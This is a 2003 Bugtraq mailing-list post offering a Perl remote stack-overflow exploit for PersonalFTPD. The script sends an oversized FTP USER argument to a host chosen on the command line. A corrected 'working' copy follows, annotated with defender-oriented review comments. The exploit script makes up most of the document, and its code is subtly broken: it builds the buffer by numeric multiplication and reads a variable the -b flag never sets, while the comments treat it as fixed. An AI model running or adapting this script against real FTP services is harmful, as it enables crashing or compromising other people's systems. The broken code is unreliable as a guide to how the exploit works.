In-Reply-To: <20030508081123.13047.qmail@www.securityfocus.com> >Received: (qmail 20952 invoked from network); 8 May 2003 14:15:36 -0000 >Received: from outgoing2.securityfocus.com (205.206.231.26) > by mail.securityfocus.com with SMTP; 8 May 2003 14:15:36 -0000 >Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) > by outgoing2.securityfocus.com (Postfix) with QMQP > id ED2648F2D9; Thu, 8 May 2003 08:19:59 -0600 (MDT) >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@securityfocus.com> >List-Help: <mailto:bugtraq-help@securityfocus.com> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> >List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Received: (qmail 22205 invoked from network); 8 May 2003 07:49:14 -0000 >Date: 8 May 2003 08:11:23 -0000 >Message-ID: <20030508081123.13047.qmail@www.securityfocus.com> >Content-Type: text/plain >Content-Disposition: inline >Content-Transfer-Encoding: binary >MIME-Version: 1.0 >X-Mailer: MIME-tools 5.411 (Entity 5.404) >From: subj <r2subj3ct@dwclan.org> >To: bugtraq@securityfocus.com >Subject: Remote Stack Overflow exploit for Personal FTPD > > > >#!/usr/bin/perl >use IO::Socket; > >########################################################## ># # ># Remote Stack Overflow sploit for PersonalFTPD # ># If wanna talk with me find me on irc # ># irc.irochka.net #dwc, #global, #phreack # ># ###################################################### # ># thanx to kabuto, drG4njubas, fnq # ># gr33tz to dhg, gipshack, rsteam, blacktigerz # ># D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 # ># ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z # ># ###################################################### # ># Vulnerability links: # ># 
http://security.nnov.ru/search/document.asp?docid=4309 # ># http://www.securityfocus.com/archive/1/316958 # ># # >########################################################## > >$data = "A"; > >print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n"; >print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n"; >print "[..] by subj | dwc :: big 10x to Kabuto [..]\n"; >print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n"; >print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n"; > >$count_param=@ARGV; >$n="0"; >if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer >size\n\n"; exit; } >while ($n<$count_param) { >if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];} >if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];} >if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];} >$n++; >} >&connect; > >sub connect >{ >$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port", >Proto => "tcp") > || die "Can\'t connect to $server port $port\n"; >print $sock "USER $buffer\n"; >print "Buffer has beens sended..."; > >} > > >close($sock); >exit; > -------------------------------------------------------------------------- I apologize: I posted a non-working version because I simply picked the wrong file. Before the $sock line it is necessary to add $buffer.
= $data * $bsize; Working code
#!/usr/bin/perl
# Review note: proof-of-concept client from a Bugtraq post. It opens one TCP
# connection to the host/port given with -h/-p and writes a single FTP
# "USER <buffer>" line; nothing is read back from the server, so the script
# itself cannot tell whether the service was affected.
# Defender view: per the post's subject the target is the USER-argument
# handling in PersonalFTPD. Presumably the network-visible signal is a USER
# argument far longer than any real account name -- confirm against the
# advisories linked in the banner below, which are also the references for
# affected versions and fixes.
use IO::Socket;

##########################################################
#                                                        #
# Remote Stack Overflow sploit for PersonalFTPD          #
# If wanna talk with me find me on irc                   #
# irc.irochka.net #dwc, #global, #phreack                #
# ###################################################### #
# thanx to kabuto, drG4njubas, fnq                       #
# gr33tz to dhg, gipshack, rsteam, blacktigerz           #
# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
# ###################################################### #
# Vulnerability links:                                   #
# http://security.nnov.ru/search/document.asp?docid=4309 #
# http://www.securityfocus.com/archive/1/316958          #
#                                                        #
##########################################################

# Single filler character referenced by the expression inside connect().
$data = "A";

# Banner printed on every run, before any argument parsing.
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
print "[..] by subj | dwc :: big 10x to Kabuto [..]\n";
print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

# @ARGV in scalar context: the number of command-line arguments.
$count_param=@ARGV;
$n="0";
# No arguments at all: print the usage line and stop.
if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer size\n\n"; exit; }
# Walk @ARGV by index; each recognised flag takes the next element as its
# value. The values are stored in package globals without any validation.
while ($n<$count_param) {
if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
$n++;
}
# The & sigil makes Perl call the user-defined sub below rather than the
# connect() builtin of the same name.
&connect;

# connect: appends to $buffer, opens a TCP socket to $server:$port and writes
# one "USER" line to it. Takes no parameters; works on package globals only.
sub connect
{
# Per the post above, this is the line that was missing from the first version.
$buffer.= $data * $bsize;
# new() yields a false value when the connection cannot be made, which
# triggers the die with the host and port in the message.
$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port",
Proto => "tcp")
 || die "Can\'t connect to $server port $port\n";
# The only protocol traffic this script generates: one USER command.
print $sock "USER $buffer\n";
# Status message is printed unconditionally; no server reply is checked.
print "Buffer has beens sended...";

}


# Runs after connect() returns: close the socket and end the script.
close($sock);
exit;